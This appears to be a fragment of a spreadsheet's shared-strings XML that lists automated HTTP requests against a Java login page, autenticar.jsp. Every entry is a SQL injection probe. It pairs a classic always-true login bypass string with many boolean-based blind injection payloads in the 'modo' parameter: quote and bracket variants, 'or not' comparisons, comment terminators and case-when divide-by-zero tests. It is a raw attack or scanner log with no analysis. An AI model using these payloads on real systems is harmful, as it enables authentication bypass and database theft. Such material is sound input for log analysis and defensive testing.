    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4377'))ornot(2685=2685)and(('dypg'like'dypg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8897'))ornot(8860=1671)and(('aono'like'aono</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3485</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4482')))ornot(8792=9066)and((('ghpc'like'ghpc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-583')))ornot(2685=2685)and((('mxsd'like'mxsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4607')))ornot(6389=3074)and((('wnhk'like'wnhk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-456</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3131'ornot(4533=6532)and'vhrv'like'vhrv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1519'ornot(2685=2685)and'xekk'like'xekk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-919'ornot(3210=6291)and'umbx'like'umbx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7537</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1788")ornot(5080=1866)and("hloa"="hloa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1441")ornot(2685=2685)and("ihge"="ihge</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8800")ornot(815=3981)and("gtws"="gtws</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7341</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4565"))ornot(6386=6997)and(("qlcc"="qlcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6825"))ornot(2685=2685)and(("fnng"="fnng</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8912"))ornot(5355=4833)and(("vdqa"="vdqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4675</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1731")))ornot(5851=1430)and((("ntgb"="ntgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8231")))ornot(2685=2685)and((("nqer"="nqer</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4354")))ornot(6866=9510)and((("ctde"="ctde</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9071</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4197"ornot(7510=8751)and"iuvr"="iuvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2990"ornot(2685=2685)and"qwhm"="qwhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-762"ornot(7471=6331)and"bmdm"="bmdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2847</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9045")ornot(4319=9113)and("ytmx"like"ytmx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-100")ornot(2685=2685)and("qzsk"like"qzsk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2333")ornot(3572=7831)and("uptp"like"uptp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8010</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6932"))ornot(3519=1246)and(("pcbg"like"pcbg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5508"))ornot(2685=2685)and(("ouyi"like"ouyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-245"))ornot(5782=8029)and(("gpmz"like"gpmz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9163</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5295")))ornot(2713=8374)and((("zwpe"like"zwpe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1047")))ornot(2685=2685)and((("nalp"like"nalp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6558")))ornot(5168=5264)and((("fijt"like"fijt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6406</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8755"ornot(6780=7308)and"upqa"like"upqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7776"ornot(2685=2685)and"slad"like"slad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5847"ornot(4876=7954)and"xqgm"like"xqgm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7640</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3197)ornot(9947=4798)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5420)ornot(8678=8678)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2727)ornot(2116=9506)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4523</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-335')ornot(7623=1768)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2966')ornot(8678=8678)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9111')ornot(855=2983)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9705</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-829'ornot(7647=2350)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7378'ornot(8678=8678)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5875'ornot(2686=8680)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1474</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7205"ornot(5148=8212)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3940"ornot(8678=8678)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8146"ornot(360=9697)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2945</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9318)ornot(3027=1693)--and(9391=9391</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7640)ornot(8678=8678)--and(3915=3915</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-77)ornot(3986=6219)--and(2452=2452</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-379</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9005))ornot(2593=2190)--and((6644=6644</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-662))ornot(8678=8678)--and((8348=8348</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-246))ornot(4799=8086)--and((6428=6428</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2809</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1184)))ornot(8049=3454)--and(((4280=4280</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9716)))ornot(8678=8678)--and(((3463=3463</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4984)))ornot(6143=7811)--and(((4396=4396</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8485</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9800ornot(3491=5922)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-256ornot(8678=8678)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1741ornot(906=4343)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2110</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7593')ornot(1997=7834)--and('cugx'='cugx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9710')ornot(8678=8678)--and('jfxy'='jfxy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-979')ornot(5973=3541)--and('xijp'='xijp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4656</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1263'))ornot(6264=8666)--and(('nuha'='nuha</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8205'))ornot(8678=8678)--and(('svol'='svol</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9715'))ornot(802=7091)--and(('nspf'='nspf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4829</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-785')))ornot(9136=4460)--and((('lvlv'='lvlv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-871')))ornot(8678=8678)--and((('iuyp'='iuyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5598')))ornot(2751=1573)--and((('iowu'='iowu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3691</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6579'ornot(766=392)--and'fkkw'='fkkw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1825'ornot(8678=8678)--and'pjlu'='pjlu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4901'ornot(2780=147)--and'xgae'='xgae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4089</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2562')ornot(5584=1689)--and('muww'like'muww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5092')ornot(8678=8678)--and('cmpx'like'cmpx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-102')ornot(8842=2773)--and('nahf'like'nahf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5979</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4214'))ornot(8268=2613)--and(('nayz'like'nayz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9044'))ornot(8678=8678)--and(('ixyd'like'ixyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6398'))ornot(7057=7470)--and(('kfpd'like'kfpd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4182</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-144')))ornot(9904=410)--and((('sxpn'like'sxpn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5968')))ornot(8678=8678)--and((('nzxs'like'nzxs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6830')))ornot(8576=7035)--and((('vuej'like'vuej</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6589</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3782'ornot(4418=568)--and'uwvz'like'uwvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7305'ornot(8678=8678)--and'sslb'like'sslb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2203'ornot(9183=9907)--and'npgp'like'npgp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7696</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8250")ornot(5382=3845)--and("oocm"="oocm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-356")ornot(8678=8678)--and("chjr"="chjr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2847")ornot(930=3410)--and("ubja"="ubja</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2694</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1186"))ornot(6974=997)--and(("opvg"="opvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4431"))ornot(8678=8678)--and(("ftwy"="ftwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4265"))ornot(5002=6284)--and(("ulnr"="ulnr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-758</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9319")))ornot(1145=1134)--and((("jzir"="jzir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2721")))ornot(8678=8678)--and((("olzr"="olzr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9655")))ornot(2785=4272)--and((("qejc"="qejc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6508</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6008"ornot(5276=1059)--and"roep"="roep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-486"ornot(8678=8678)--and"edvo"="edvo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-50"ornot(479=3119)--and"fdbr"="fdbr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6071</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7932")ornot(4549=6177)--and("xfvn"like"xfvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1899")ornot(8678=8678)--and("stqq"like"stqq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9807")ornot(969=9235)--and("hwuq"like"hwuq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6550</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6464"))ornot(5661=8369)--and(("bhvc"like"bhvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4799"))ornot(8678=8678)--and(("pipo"like"pipo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1171"))ornot(454=9416)--and(("scpg"like"scpg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2052</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2540")))ornot(2967=437)--and((("uuze"like"uuze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8898")))ornot(8678=8678)--and((("ueyd"like"ueyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5099")))ornot(2130=1033)--and((("wnbp"like"wnbp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6311</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9449"ornot(9346=2816)--and"tmax"like"tmax</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9992"ornot(8678=8678)--and"fbjr"like"fbjr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9093"ornot(3397=7658)--and"lejq"like"lejq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(9386=1229)thenentrarelse1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(548=548)thenentrarelse1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(5290=9896)thenentrarelse1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(6980=3493)then1else1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(6445=6445)then1else1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(8475=6683)then1else1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(7162=4498)thenentrarelse1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(5082=5082)thenentrarelse1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(7384=7410)thenentrarelse1/(select0)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7395=1776#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and1396=1396#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3020=6287#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and115=7162#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and1396=1396#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and6428=9731#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3837=9740#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and1396=1396#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7128=6337#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and1067=3333#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and1396=1396#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and1091=9072#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3305=476#and(5073=5073</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and1396=1396#and(4560=4560</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5678=840#and(2807=2807</t>
  </si>
  <si>
